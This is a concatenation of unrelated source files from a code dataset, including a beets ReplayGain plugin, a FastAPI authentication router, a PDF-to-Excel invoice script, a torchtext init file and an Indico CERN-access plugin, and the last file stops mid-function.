# The method needs an audiotools.PCMReader instance that can
# be obtained from an audiofile instance.
return rg.title_gain(audiofile.to_pcm())
except ValueError as exc:
# `audiotools.replaygain` can raise a `ValueError` if the sample
# rate is incorrect.
self._log.debug(u'error in rg.title_gain() call: {}', exc)
raise ReplayGainError(u'audiotools audio data error')
def _compute_track_gain(self, item):
"""Compute ReplayGain value for the requested item.
:rtype: :class:`Gain`
"""
audiofile = self.open_audio_file(item)
rg = self.init_replaygain(audiofile, item)
# Each call to title_gain on a ReplayGain object returns peak and gain
# of the track.
rg_track_gain, rg_track_peak = self._title_gain(rg, audiofile)
self._log.debug(u'ReplayGain for track {0} - {1}: {2:.2f}, {3:.2f}',
item.artist, item.title, rg_track_gain, rg_track_peak)
return Gain(gain=rg_track_gain, peak=rg_track_peak)
def compute_album_gain(self, album):
"""Compute ReplayGain values for the requested album and its items.
:rtype: :class:`AlbumGain`
"""
self._log.debug(u'Analysing album {0}', album)
# The first item is taken and opened to get the sample rate to
# initialize the replaygain object. The object is used for all the
# tracks in the album to get the album values.
item = list(album.items())[0]
audiofile = self.open_audio_file(item)
rg = self.init_replaygain(audiofile, item)
track_gains = []
for item in album.items():
audiofile = self.open_audio_file(item)
rg_track_gain, rg_track_peak = self._title_gain(rg, audiofile)
track_gains.append(
Gain(gain=rg_track_gain, peak=rg_track_peak)
)
self._log.debug(u'ReplayGain for track {0}: {1:.2f}, {2:.2f}',
item, rg_track_gain, rg_track_peak)
# After getting the values for all tracks, it's possible to get the
# album values.
rg_album_gain, rg_album_peak = rg.album_gain()
self._log.debug(u'ReplayGain for album {0}: {1:.2f}, {2:.2f}',
album, rg_album_gain, rg_album_peak)
return AlbumGain(
Gain(gain=rg_album_gain, peak=rg_album_peak),
track_gains=track_gains
)
# Main plugin logic.
class ReplayGainPlugin(BeetsPlugin):
"""Provides ReplayGain analysis.
"""
backends = {
"command": CommandBackend,
"gstreamer": GStreamerBackend,
"audiotools": AudioToolsBackend,
"bs1770gain": Bs1770gainBackend,
}
def __init__(self):
super(ReplayGainPlugin, self).__init__()
# default backend is 'command' for backward-compatibility.
self.config.add({
'overwrite': False,
'auto': True,
'backend': u'command',
'targetlevel': 89,
'r128': ['Opus'],
})
self.overwrite = self.config['overwrite'].get(bool)
backend_name = self.config['backend'].as_str()
if backend_name not in self.backends:
raise ui.UserError(
u"Selected ReplayGain backend {0} is not supported. "
u"Please select one of: {1}".format(
backend_name,
u', '.join(self.backends.keys())
)
)
# On-import analysis.
if self.config['auto']:
self.import_stages = [self.imported]
# Formats to use R128.
self.r128_whitelist = self.config['r128'].as_str_seq()
try:
self.backend_instance = self.backends[backend_name](
self.config, self._log
)
except (ReplayGainError, FatalReplayGainError) as e:
raise ui.UserError(
u'replaygain initialization failed: {0}'.format(e))
self.r128_backend_instance = ''
def should_use_r128(self, item):
"""Checks the plugin setting to decide whether the calculation
should be done using the EBU R128 standard and use R128_ tags instead.
"""
return item.format in self.r128_whitelist
def track_requires_gain(self, item):
return self.overwrite or \
(self.should_use_r128(item) and not item.r128_track_gain) or \
(not self.should_use_r128(item) and
(not item.rg_track_gain or not item.rg_track_peak))
def album_requires_gain(self, album):
# Skip calculating gain only when *all* files don't need
# recalculation. This way, if any file among an album's tracks
# needs recalculation, we still get an accurate album gain
# value.
return self.overwrite or \
any([self.should_use_r128(item) and
(not item.r128_track_gain or not item.r128_album_gain)
for item in album.items()]) or \
any([not self.should_use_r128(item) and
(not item.rg_album_gain or not item.rg_album_peak)
for item in album.items()])
def store_track_gain(self, item, track_gain):
item.rg_track_gain = track_gain.gain
item.rg_track_peak = track_gain.peak
item.store()
self._log.debug(u'applied track gain {0}, peak {1}',
item.rg_track_gain, item.rg_track_peak)
def store_track_r128_gain(self, item, track_gain):
item.r128_track_gain = int(round(track_gain.gain * pow(2, 8)))
item.store()
self._log.debug(u'applied r128 track gain {0}', item.r128_track_gain)
def store_album_gain(self, album, album_gain):
album.rg_album_gain = album_gain.gain
album.rg_album_peak = album_gain.peak
album.store()
self._log.debug(u'applied album gain {0}, peak {1}',
album.rg_album_gain, album.rg_album_peak)
def store_album_r128_gain(self, album, album_gain):
album.r128_album_gain = int(round(album_gain.gain * pow(2, 8)))
album.store()
self._log.debug(u'applied r128 album gain {0}', album.r128_album_gain)
def handle_album(self, album, write, force=False):
"""Compute album and track replay gain store it in all of the
album's items.
If ``write`` is truthy then ``item.write()`` is called for each
item. If replay gain information is already present in all
items, nothing is done.
"""
if not force and not self.album_requires_gain(album):
self._log.info(u'Skipping album {0}', album)
return
self._log.info(u'analyzing {0}', album)
if (any([self.should_use_r128(item) for item in album.items()]) and not
all(([self.should_use_r128(item) for item in album.items()]))):
raise ReplayGainError(
u"Mix of ReplayGain and EBU R128 detected"
u" for some tracks in album {0}".format(album)
)
if any([self.should_use_r128(item) for item in album.items()]):
if self.r128_backend_instance == '':
self.init_r128_backend()
backend_instance = self.r128_backend_instance
store_track_gain = self.store_track_r128_gain
store_album_gain = self.store_album_r128_gain
else:
backend_instance = self.backend_instance
store_track_gain = self.store_track_gain
store_album_gain = self.store_album_gain
try:
album_gain = backend_instance.compute_album_gain(album)
if len(album_gain.track_gains) != len(album.items()):
raise ReplayGainError(
u"ReplayGain backend failed "
u"for some tracks in album {0}".format(album)
)
store_album_gain(album, album_gain.album_gain)
for item, track_gain in zip(album.items(), album_gain.track_gains):
store_track_gain(item, track_gain)
if write:
item.try_write()
except ReplayGainError as e:
self._log.info(u"ReplayGain error: {0}", e)
except FatalReplayGainError as e:
raise ui.UserError(
u"Fatal replay gain error: {0}".format(e))
def handle_track(self, item, write, force=False):
"""Compute track replay gain and store it in the item.
If ``write`` is truthy then ``item.write()`` is called to write
the data to disk. If replay gain information is already present
in the item, nothing is done.
"""
if not force and not self.track_requires_gain(item):
self._log.info(u'Skipping track {0}', item)
return
self._log.info(u'analyzing {0}', item)
if self.should_use_r128(item):
if self.r128_backend_instance == '':
self.init_r128_backend()
backend_instance = self.r128_backend_instance
store_track_gain = self.store_track_r128_gain
else:
backend_instance = self.backend_instance
store_track_gain = self.store_track_gain
try:
track_gains = backend_instance.compute_track_gain([item])
if len(track_gains) != 1:
raise ReplayGainError(
u"ReplayGain backend failed for track {0}".format(item)
)
store_track_gain(item, track_gains[0])
if write:
item.try_write()
except ReplayGainError as e:
self._log.info(u"ReplayGain error: {0}", e)
except FatalReplayGainError as e:
raise ui.UserError(
u"Fatal replay gain error: {0}".format(e))
def init_r128_backend(self):
backend_name = 'bs1770gain'
try:
self.r128_backend_instance = self.backends[backend_name](
self.config, self._log
)
except (ReplayGainError, FatalReplayGainError) as e:
raise ui.UserError(
u'replaygain initialization failed: {0}'.format(e))
self.r128_backend_instance.method = '--ebu'
def imported(self, session, task):
"""Add replay gain info to items or albums of ``task``.
"""
if task.is_album:
self.handle_album(task.album, False)
else:
self.handle_track(task.item, False)
def commands(self):
"""Return the "replaygain" ui subcommand.
"""
def func(lib, opts, args):
write = ui.should_write(opts.write)
force = opts.force
if opts.album:
for album in lib.albums(ui.decargs(args)):
self.handle_album(album, write, force)
else:
for item in lib.items(ui.decargs(args)):
self.handle_track(item, write, force)
cmd = ui.Subcommand('replaygain', help=u'analyze for ReplayGain')
cmd.parser.add_album_option()
cmd.parser.add_option(
"-f", "--force", dest="force", action="store_true", default=False,
help=u"analyze all files, including those that "
"already have ReplayGain metadata")
cmd.parser.add_option(
"-w", "--write", default=None, action="store_true",
help=u"write new metadata to files' tags")
cmd.parser.add_option(
"-W", "--nowrite", dest="write", action="store_false",
help=u"don't write metadata (opposite of -w)")
cmd.func = func
return [cmd]
| 37.191948
| 79
| 0.596058
|
4a0ea08874afc508076444aea5864c451383890e
| 3,103
|
py
|
Python
|
runner.py
|
dinheironamesa/Faturas_Energia
|
3a9c65a65991b9bdf5754675a8ac87ab1bdf0846
|
[
"Apache-2.0"
] | null | null | null |
runner.py
|
dinheironamesa/Faturas_Energia
|
3a9c65a65991b9bdf5754675a8ac87ab1bdf0846
|
[
"Apache-2.0"
] | null | null | null |
runner.py
|
dinheironamesa/Faturas_Energia
|
3a9c65a65991b9bdf5754675a8ac87ab1bdf0846
|
[
"Apache-2.0"
] | null | null | null |
from os import listdir
from xlsxwriter import Workbook
from scrapper import scrape
if __name__ == '__main__':
workbook = Workbook('fatura.xlsx')
worksheet = workbook.add_worksheet()
# Headers
worksheet.write('A1', 'produto1')
worksheet.write('B1', 'unidade')
worksheet.write('C1', 'grandezas_faturadas')
worksheet.write('D1', 'valor_unitario')
worksheet.write('E1', 'valor_total')
worksheet.write('F1', 'base_de_calculo')
worksheet.write('G1', 'aliquota_icms')
worksheet.write('H1', 'produto2')
worksheet.write('I1', 'leitura_anterior')
worksheet.write('J1', 'leitura_anual')
worksheet.write('K1', 'leitura_anual')
worksheet.write('L1', 'medido')
worksheet.write('M1', 'contratado')
worksheet.write('N1', 'faturado')
worksheet.write('O1', 'tarifa')
worksheet.write('P1', 'total')
pdfs = filter(
lambda pdf: pdf.lower().endswith('.pdf'),
listdir('pdfs/')
)
total_pdfs = 1
index = 2
for result in map(scrape, pdfs):
print('PDF #{} was processed.'.format(total_pdfs))
total_pdfs += 1
for data in result:
index += 1
worksheet.write(
'A{}'.format(index),
data.get('produto1')
)
worksheet.write(
'B{}'.format(index),
data.get('unidade')
)
worksheet.write(
'C{}'.format(index),
data.get('grandezas_faturadas')
)
worksheet.write(
'D{}'.format(index),
data.get('valor_unitario')
)
worksheet.write(
'E{}'.format(index),
data.get('valor_total')
)
worksheet.write(
'F{}'.format(index),
data.get('base_de_calculo')
)
worksheet.write(
'G{}'.format(index),
data.get('aliquota_icms')
)
worksheet.write(
'H{}'.format(index),
data.get('produto2')
)
worksheet.write(
'I{}'.format(index),
data.get('leitura_anterior')
)
worksheet.write(
'J{}'.format(index),
data.get('leitura_anual')
)
worksheet.write(
'K{}'.format(index),
data.get('leitura_anual')
)
worksheet.write(
'L{}'.format(index),
data.get('medido')
)
worksheet.write(
'M{}'.format(index),
data.get('contratado')
)
worksheet.write(
'N{}'.format(index),
data.get('faturado')
)
worksheet.write(
'O{}'.format(index),
data.get('tarifa')
)
worksheet.write(
'P{}'.format(index),
data.get('total')
)
workbook.close()
| 29.273585
| 58
| 0.467612
|
4a0ea0c4afcdbb01f83d9ddb254b19882dcd2f98
| 969
|
py
|
Python
|
week2/task8.py
|
sdanil-ops/stepik-beegeek-python
|
02302ab85d581962a82cbce766b7b284d4c5491e
|
[
"MIT"
] | null | null | null |
week2/task8.py
|
sdanil-ops/stepik-beegeek-python
|
02302ab85d581962a82cbce766b7b284d4c5491e
|
[
"MIT"
] | null | null | null |
week2/task8.py
|
sdanil-ops/stepik-beegeek-python
|
02302ab85d581962a82cbce766b7b284d4c5491e
|
[
"MIT"
] | 1
|
2021-08-18T00:58:27.000Z
|
2021-08-18T00:58:27.000Z
|
# -----------------------------------------------------------
# Copyright (c) 2021. Danil Smirnov
# The program is fed three lines, each on a separate line.
# The program should print the entered lines in reverse order,
# each on a separate line. Uses code from previous task.
# Just paste it.
# -----------------------------------------------------------
from typing import List
from task1 import TestUnit
class ThreeStrings:
def __init__(self, strings: List[str]):
self.strings = strings
def __repr__(self):
data = self.strings[::-1]
result = ''
for string in data:
result += string + '\n'
return result
# test
if __name__ == '__main__':
test = TestUnit(ThreeStrings, ['i', 'was', 'born'], 'born\nwas\ni\n')
print('passed' if test.is_passed else 'failed')
# run
# if __name__ == '__main__':
# strings = ThreeStrings([input() for _ in range(3)])
# print(strings)
| 27.685714
| 73
| 0.544892
|
4a0ea1a52d8454db9ac2e9016f5b06c6e6f96a80
| 7,060
|
py
|
Python
|
SEPHIRA/FastAPI/resources/auth.py
|
dman926/Flask-API
|
49e052159a3915ec25305141ecdd6cdeb1d7a25c
|
[
"MIT"
] | 4
|
2021-04-23T16:51:57.000Z
|
2021-06-06T20:28:08.000Z
|
SEPHIRA/FastAPI/resources/auth.py
|
dman926/Flask-API
|
49e052159a3915ec25305141ecdd6cdeb1d7a25c
|
[
"MIT"
] | null | null | null |
SEPHIRA/FastAPI/resources/auth.py
|
dman926/Flask-API
|
49e052159a3915ec25305141ecdd6cdeb1d7a25c
|
[
"MIT"
] | 3
|
2021-03-21T22:29:05.000Z
|
2021-06-06T20:30:18.000Z
|
from fastapi import APIRouter, Request
from fastapi.security.oauth2 import OAuth2PasswordRequestForm
from config import APISettings
from fastapi import Depends
from pydantic import BaseModel, EmailStr
from typing import Optional
from mongoengine.errors import NotUniqueError, DoesNotExist
from modules.JWT import Token, create_access_token, create_refresh_token, get_jwt_identity, get_raw_token
from database.models import User, UserModel
from resources.errors import UserAlreadyExistsError, UnauthorizedError, MissingOtpError
from services.mail_service import send_email_async
from services.util_service import base_model_to_clean_dict
from datetime import timedelta
from time import sleep
import base64
import os
router = APIRouter(
prefix=APISettings.ROUTE_BASE + 'auth',
tags=['Auth']
)
###########
# SCHEMAS #
###########
class EmailPasswordForm(BaseModel):
username: EmailStr
password: str
client_secret: Optional[str] = None
client_id: Optional[str] = None
class PasswordForm(BaseModel):
password: str
class OtpForm(BaseModel):
otp: str
class EmailForm(BaseModel):
email: str
##########
# ROUTES #
##########
@router.post('/signup')
async def signup(form_data: EmailPasswordForm):
try:
user = User(email = form_data.username, password = form_data.password)
if User.objects.count() == 0:
user.admin = True
user.hash_password()
user.save()
return { 'id': str(user.id) }
except NotUniqueError:
raise UserAlreadyExistsError().http_exception
except Exception as e:
raise e
@router.post('/login')
async def login(form_data: EmailPasswordForm):
try:
user = None
if form_data.client_secret:
user = User.objects.get(email=get_jwt_identity(form_data.client_secret))
else:
user = User.objects.get(email=form_data.username)
if not user.check_password(form_data.password):
raise UnauthorizedError
if user.twoFactorEnabled:
otp = form_data.client_id
if not otp:
raise MissingOtpError
if not user.verify_totp(otp):
raise UnauthorizedError
return {
'access_token': create_access_token(identity=str(user.id)),
'refresh_token': create_refresh_token(identity=str(user.id))
}
except (UnauthorizedError, DoesNotExist):
sleep(2)
raise UnauthorizedError(detail='Incorrect email, password, or otp').http_exception
except MissingOtpError:
raise MissingOtpError().http_exception
except Exception as e:
raise e
# needed a separate login for docs due to how it sends the login data
@router.post('/docs-login')
async def login(form_data: OAuth2PasswordRequestForm = Depends()):
try:
if form_data.client_secret:
user = User.objects.get(email=get_jwt_identity(form_data.client_secret))
else:
user = User.objects.get(email=form_data.username)
if not user.check_password(form_data.password):
raise UnauthorizedError
if user.twoFactorEnabled:
otp = form_data.client_id
if not otp:
raise MissingOtpError
if not user.verify_totp(otp):
raise UnauthorizedError
return {
'access_token': create_access_token(identity=str(user.id)),
'refresh_token': create_refresh_token(identity=str(user.id))
}
except (UnauthorizedError, DoesNotExist):
sleep(2)
raise UnauthorizedError(detail='Incorrect email, password, or otp').http_exception
except MissingOtpError:
raise MissingOtpError().http_exception
except Exception as e:
raise e
@router.post('/refresh')
async def token_refresh2(token: Token = Depends(get_raw_token)):
try:
if 'refresh' not in token or not token['refresh']:
raise UnauthorizedError
identity = token['sub']
User.objects.get(id=identity) # Verify the user exists
return {
'access_token': create_access_token(identity=identity),
'refresh_token': create_refresh_token(identity=identity)
}
return True
except UnauthorizedError:
raise UnauthorizedError(detail='Invalid token. Not a refresh token').http_exception
except DoesNotExist:
raise UnauthorizedError(detail='Invalid token').http_exception
except Exception as e:
raise e
@router.get('/check-password')
async def check_password(password_body: PasswordForm, identity: str = Depends(get_jwt_identity)):
try:
user = User.objects.get(id=identity)
authorized = user.check_password(password_body.password)
if not authorized:
raise UnauthorizedError
return 'ok'
except (UnauthorizedError, DoesNotExist):
raise UnauthorizedError().http_exception
except Exception as e:
raise e
@router.get('/2fa')
async def get_otp_code(identity: str = Depends(get_jwt_identity)):
try:
user = User.objects.get(id=identity)
user.otpSecret = base64.b32encode(os.urandom(10)).decode('utf8')
user.save()
return user.get_totp_uri()
except DoesNotExist:
raise UnauthorizedError().http_exception
except Exception as e:
raise e
@router.post('/2fa')
async def verify_otp_code(otp_body: OtpForm, identity: str = Depends(get_jwt_identity)):
try:
user = User.objects.get(id=identity)
if user.verify_totp(otp_body.otp):
return True
raise UnauthorizedError
except (UnauthorizedError, DoesNotExist):
raise UnauthorizedError().http_exception
except Exception as e:
raise e
@router.post('/forgot')
async def forgot_password(email_body: EmailForm, request: Request):
try:
user = User.objects.get(email=email_body.email)
reset_token = create_access_token(str(user.id), expires_delta=timedelta(days=1))
send_email_async(
'[SEPHIRA] Reset Your Password',
[email_body.email],
'reset_password.html',
{
'url': request.client.host + '/reset/?t=' + reset_token,
}
)
return 'ok'
except DoesNotExist:
sleep(2)
return 'ok'
except Exception as e:
raise e
@router.post('/reset')
async def reset_password(password_body: PasswordForm, identity: str = Depends(get_jwt_identity)):
try:
user = User.objects.get(id=identity)
user.modify(password=password_body.password)
user.hash_password()
user.save()
send_email_async(
'[SEPHIRA] Password Has Been Reset',
[user.email],
'password_reset.html'
)
return 'ok'
except Exception as e:
raise e
@router.get('/user')
async def get_user(identity: str = Depends(get_jwt_identity)):
try:
user = User.objects.get(id=identity)
return user.serialize()
except DoesNotExist:
raise UnauthorizedError().http_exception
except Exception as e:
raise e
@router.put('/user')
async def update_user(user: UserModel, identity: str = Depends(get_jwt_identity)):
try:
foundUser = User.objects.get(id=identity)
if user.admin:
raise UnauthorizedError # Cannot set themselves as admin
foundUser.update(**base_model_to_clean_dict(user))
if user.password:
user.hash_password()
user.save()
return True
except (UnauthorizedError, DoesNotExist):
raise UnauthorizedError().http_exception
except Exception as e:
raise e
@router.delete('/user')
async def delete_user(identity: str = Depends(get_jwt_identity)):
try:
# TODO: 'archive' the user instead of deleting
User.objects.get(id=identity).delete()
return True
except DoesNotExist:
raise UnauthorizedError().http_exception
except Exception as e:
raise e
| 28.699187
| 105
| 0.754674
|
4a0ea1dc6b04995e282b5a8430c52c4efcc2aefc
| 639
|
py
|
Python
|
torchtext/datasets/__init__.py
|
kortemaki/text
|
ea64e1d28c794ed6ffc0a5c66651c33e2f57f01f
|
[
"BSD-3-Clause"
] | 1
|
2018-04-04T08:31:40.000Z
|
2018-04-04T08:31:40.000Z
|
torchtext/datasets/__init__.py
|
kortemaki/text
|
ea64e1d28c794ed6ffc0a5c66651c33e2f57f01f
|
[
"BSD-3-Clause"
] | null | null | null |
torchtext/datasets/__init__.py
|
kortemaki/text
|
ea64e1d28c794ed6ffc0a5c66651c33e2f57f01f
|
[
"BSD-3-Clause"
] | null | null | null |
from .language_modeling import LanguageModelingDataset, WikiText2, PennTreebank # NOQA
from .snli import SNLI
from .sst import SST
from .translation import TranslationDataset, Multi30k, IWSLT, WMT14 # NOQA
from .sequence_tagging import SequenceTaggingDataset, UDPOS # NOQA
from .trec import TREC
from .imdb import IMDB
__all__ = ['LanguageModelingDataset',
'SNLI',
'SST',
'TranslationDataset',
'Multi30k',
'IWSLT',
'WMT14'
'WikiText2',
'PennTreeBank',
'TREC',
'IMDB',
'SequenceTaggingDataset',
'UDPOS']
| 27.782609
| 87
| 0.613459
|
4a0ea21336559daddaebbf35f06f4c5f4879864b
| 16,133
|
py
|
Python
|
cern_access/indico_cern_access/util.py
|
plourenco/indico-plugins-cern
|
5be71a552825afdd93a3bc7e7141335b8559c41a
|
[
"MIT"
] | null | null | null |
cern_access/indico_cern_access/util.py
|
plourenco/indico-plugins-cern
|
5be71a552825afdd93a3bc7e7141335b8559c41a
|
[
"MIT"
] | null | null | null |
cern_access/indico_cern_access/util.py
|
plourenco/indico-plugins-cern
|
5be71a552825afdd93a3bc7e7141335b8559c41a
|
[
"MIT"
] | null | null | null |
# This file is part of the CERN Indico plugins.
# Copyright (C) 2014 - 2020 CERN
#
# The CERN Indico plugins are free software; you can redistribute
# them and/or modify them under the terms of the MIT License; see
# the LICENSE file for more details.
from __future__ import unicode_literals
import hashlib
import hmac
import json
import random
import re
import dateutil.parser
import requests
from flask import session
from jinja2.filters import do_truncate
from pytz import timezone
from werkzeug.exceptions import Forbidden
from indico.core.db import db
from indico.core.notifications import make_email, send_email
from indico.modules.events import Event
from indico.modules.events.registration.models.forms import RegistrationForm
from indico.modules.events.registration.models.registrations import Registration
from indico.modules.events.registration.util import get_ticket_attachments
from indico.modules.events.requests.models.requests import Request
from indico.util.date_time import now_utc
from indico.util.placeholders import replace_placeholders
from indico.util.string import remove_accents, unicode_to_ascii
from indico.web.flask.templating import get_template_module
from indico_cern_access import _
from indico_cern_access.models.access_request_regforms import CERNAccessRequestRegForm
from indico_cern_access.models.access_requests import CERNAccessRequest, CERNAccessRequestState
def get_last_request(event):
"""Return the last CERN Access request for the event."""
from indico_cern_access.definition import CERNAccessRequestDefinition
return Request.find_latest_for_event(event, CERNAccessRequestDefinition.name)
def get_requested_forms(event):
"""Return list of registration forms with requested access to CERN."""
return (RegistrationForm.query.with_parent(event)
.join(CERNAccessRequestRegForm)
.filter(CERNAccessRequestRegForm.is_active)
.all())
def get_requested_registrations(event, regform=None, only_active=False):
"""By default returns a list of requested registrations of an event
:param regform: if specified, returns only registrations with that registration form
"""
query = (Registration.query.with_parent(event)
.join(CERNAccessRequest))
if only_active:
query = query.filter(CERNAccessRequest.is_active)
else:
query = query.filter(~CERNAccessRequest.is_withdrawn)
if regform:
query = query.filter(Registration.registration_form_id == regform.id)
return query.all()
def _send_adams_http_request(method, data):
from indico_cern_access.plugin import CERNAccessPlugin
url = CERNAccessPlugin.settings.get('adams_url')
credentials = (CERNAccessPlugin.settings.get('username'), CERNAccessPlugin.settings.get('password'))
request_headers = {'Content-Type': 'application/json'}
try:
r = requests.request(method, url, data=json.dumps(data), headers=request_headers, auth=credentials)
r.raise_for_status()
except requests.exceptions.RequestException:
CERNAccessPlugin.logger.exception('Request to ADAMS failed (%r)', data)
raise AdamsError(_('Sending request to ADAMS failed'))
return r.status_code == requests.codes.all_ok
def send_adams_post_request(event, registrations, update=False):
"""Send POST request to ADaMS API
:param update: if True, send request updating already stored data
"""
data = {reg.id: build_access_request_data(reg, event, generate_code=(not update)) for reg in registrations}
_send_adams_http_request('POST', data.values())
return CERNAccessRequestState.active, data
def send_adams_delete_request(registrations):
"""Send DELETE request to ADaMS API."""
data = [generate_access_id(registration.id) for registration in registrations]
_send_adams_http_request('DELETE', data)
def generate_access_id(registration_id):
"""Generate an id in format required by ADaMS API."""
return 'in{}'.format(registration_id)
def build_access_request_data(registration, event, generate_code):
"""Return a dictionary with data required by ADaMS API."""
from indico_cern_access.plugin import CERNAccessPlugin
start_dt, end_dt = get_access_dates(get_last_request(event))
tz = timezone('Europe/Zurich')
title = do_truncate(None, unicode_to_ascii(remove_accents(event.title)), 100, leeway=0)
if generate_code:
reservation_code = get_random_reservation_code()
else:
reservation_code = registration.cern_access_request.reservation_code
data = {'$id': generate_access_id(registration.id),
'$rc': reservation_code,
'$gn': title,
'$fn': unicode_to_ascii(remove_accents(registration.first_name)),
'$ln': unicode_to_ascii(remove_accents(registration.last_name)),
'$sd': start_dt.astimezone(tz).strftime('%Y-%m-%dT%H:%M'),
'$ed': end_dt.astimezone(tz).strftime('%Y-%m-%dT%H:%M')}
if registration.cern_access_request and registration.cern_access_request.license_plate:
data['$lp'] = registration.cern_access_request.license_plate
checksum = ';;'.join('{}:{}'.format(key, value) for key, value in sorted(data.viewitems()))
signature = hmac.new(str(CERNAccessPlugin.settings.get('secret_key')), checksum, hashlib.sha256)
data['$si'] = signature.hexdigest()
return data
def handle_event_time_update(event):
"""Update access requests after an event time change"""
registrations = get_requested_registrations(event=event, only_active=True)
if registrations:
state = send_adams_post_request(event, registrations, update=True)[0]
if state == CERNAccessRequestState.active:
update_access_requests(registrations, state)
def update_access_request(req):
"""Add, update and delete CERN access requests from registration forms."""
event = req.event
existing_forms = get_requested_forms(event)
requested_forms = req.data['regforms']
# Pull out ids of existing and requested forms to easily
# check which ones should be added/deleted afterwards
existing_forms_ids = {regform.id for regform in existing_forms}
requested_forms_ids = {int(id) for id in requested_forms}
event_regforms = {regform.id: regform for regform in event.registration_forms}
# add requests
for regform_id in requested_forms_ids - existing_forms_ids:
regform = event_regforms[regform_id]
create_access_request_regform(regform, state=CERNAccessRequestState.active)
enable_ticketing(regform)
# delete requests
for regform_id in existing_forms_ids - requested_forms_ids:
regform = event_regforms[regform_id]
registrations = get_requested_registrations(event, regform=regform)
if registrations:
send_adams_delete_request(registrations)
regform.cern_access_request.request_state = CERNAccessRequestState.withdrawn
remove_access_template(regform)
withdraw_access_requests(registrations)
notify_access_withdrawn(registrations)
def remove_access_template(regform):
from indico_cern_access.plugin import CERNAccessPlugin
access_tpl = CERNAccessPlugin.settings.get('access_ticket_template')
if regform.ticket_template == access_tpl:
regform.ticket_template = None
def add_access_requests(registrations, data, state):
"""Add CERN access requests for registrations."""
for registration in registrations:
create_access_request(registration, state, data[registration.id]['$rc'])
def update_access_requests(registrations, state):
"""Update already requested registrations."""
for registration in registrations:
registration.cern_access_request.request_state = state
def withdraw_access_requests(registrations):
"""Withdraw CERN access requests for registrations."""
for registration in registrations:
registration.cern_access_request.request_state = CERNAccessRequestState.withdrawn
registration.cern_access_request.clear_identity_data()
def withdraw_event_access_request(req):
"""Withdraw all CERN access requests of an event."""
requested_forms = get_requested_forms(req.event)
requested_registrations = get_requested_registrations(req.event)
if requested_registrations:
send_adams_delete_request(requested_registrations)
for regform in requested_forms:
regform.cern_access_request.request_state = CERNAccessRequestState.withdrawn
remove_access_template(regform)
withdraw_access_requests(requested_registrations)
notify_access_withdrawn(requested_registrations)
def get_random_reservation_code():
"""Generate random reservation code for data required by ADaMS API."""
charset = 'ABCDEFGHIJKLMNPQRSTUVWXYZ123456789'
return 'I' + ''.join(random.sample(charset, 6))
def create_access_request(registration, state, reservation_code):
"""Create CERN access request object for registration."""
if registration.cern_access_request:
registration.cern_access_request.request_state = state
registration.cern_access_request.reservation_code = reservation_code
else:
registration.cern_access_request = CERNAccessRequest(request_state=state,
reservation_code=reservation_code)
def create_access_request_regform(regform, state):
"""Create CERN access request object for registration form."""
from indico_cern_access.plugin import CERNAccessPlugin
access_tpl = CERNAccessPlugin.settings.get('access_ticket_template')
if state == CERNAccessRequestState.active and access_tpl:
regform.ticket_template = access_tpl
if regform.cern_access_request:
regform.cern_access_request.request_state = state
else:
regform.cern_access_request = CERNAccessRequestRegForm(request_state=state)
def is_authorized_user(user):
"""Check if user is authorized to request access to CERN."""
from indico_cern_access.plugin import CERNAccessPlugin
if user.is_admin:
return True
return CERNAccessPlugin.settings.acls.contains_user('authorized_users', user)
def notify_access_withdrawn(registrations):
"""Notify participants when access to CERN has been withdrawn."""
for registration in registrations:
template = get_template_module('cern_access:emails/request_withdrawn_email.html', registration=registration)
email = make_email(to_list=registration.email, template=template, html=True)
send_email(email, event=registration.registration_form.event, module='Registration',
user=(session.user if session else None))
def send_ticket(registration):
"""Send the ticket to access the CERN site by email."""
start_dt, end_dt = get_access_dates(get_last_request(registration.event))
template = get_template_module('cern_access:emails/ticket_email.html', registration=registration,
start_dt=start_dt, end_dt=end_dt)
attachments = get_ticket_attachments(registration)
email = make_email(to_list=registration.email, template=template, html=True, attachments=attachments)
send_email(email, event=registration.registration_form.event, module='Registration', user=session.user)
def enable_ticketing(regform):
"""Enable ticketing module automatically."""
if not regform.tickets_enabled:
regform.tickets_enabled = True
regform.ticket_on_email = True
regform.ticket_on_event_page = True
regform.ticket_on_summary_page = True
def is_category_blacklisted(category):
from indico_cern_access.plugin import CERNAccessPlugin
return any(category.id == int(cat['id']) for cat in CERNAccessPlugin.settings.get('excluded_categories'))
def is_event_too_early(event):
from indico_cern_access.plugin import CERNAccessPlugin
earliest_start_dt = CERNAccessPlugin.settings.get('earliest_start_dt')
return earliest_start_dt is not None and event.start_dt < earliest_start_dt
def grant_access(registrations, regform, email_subject=None, email_body=None, email_sender=None):
event = regform.event
new_registrations = [reg for reg in registrations
if not (reg.cern_access_request and
not reg.cern_access_request.is_withdrawn and
reg.cern_access_request.request_state == CERNAccessRequestState.active)]
state, data = send_adams_post_request(event, new_registrations)
add_access_requests(new_registrations, data, state)
registrations_without_data = []
for registration in new_registrations:
if not registration.cern_access_request.has_identity_info:
registrations_without_data.append(registration)
elif regform.ticket_on_email:
send_ticket(registration)
if registrations_without_data:
send_form_link(registrations_without_data, email_subject, email_body, email_sender)
def send_form_link(registrations, email_subject_tpl, email_body_tpl, email_sender):
"""Send a mail asking for personal information to be filled in using a web form."""
for registration in registrations:
email_body = replace_placeholders('cern-access-email', email_body_tpl,
regform=registration.registration_form, registration=registration)
email_subject = replace_placeholders('cern-access-email', email_subject_tpl,
regform=registration.registration_form, registration=registration)
template = get_template_module('cern_access:emails/identity_data_form_email.html', registration=registration,
email_subject=email_subject, email_body=email_body)
email = make_email(to_list=registration.email, from_address=email_sender, template=template, html=True)
send_email(email, event=registration.registration_form.event, module='Registration', user=session.user)
def revoke_access(registrations):
if not registrations:
return
send_adams_delete_request(registrations)
requested_registrations = [reg for reg in registrations if
reg.cern_access_request and not
reg.cern_access_request.is_withdrawn and
reg.cern_access_request.request_state == CERNAccessRequestState.active]
withdraw_access_requests(requested_registrations)
notify_access_withdrawn(requested_registrations)
def check_access(req):
user_authorized = is_authorized_user(session.user)
category_blacklisted = is_category_blacklisted(req.event.category)
too_early = is_event_too_early(req.event)
if not user_authorized or category_blacklisted or too_early:
raise Forbidden()
def get_access_dates(req):
start_dt_override = req.data['start_dt_override']
end_dt_override = req.data['end_dt_override']
if start_dt_override and end_dt_override:
start_dt_override = dateutil.parser.parse(start_dt_override)
end_dt_override = dateutil.parser.parse(end_dt_override)
return start_dt_override, end_dt_override
else:
return req.event.start_dt, req.event.end_dt
def sanitize_personal_data():
from indico_cern_access.plugin import CERNAccessPlugin
query = (CERNAccessRequest.query
.join(CERNAccessRequest.registration)
.join(Registration.event)
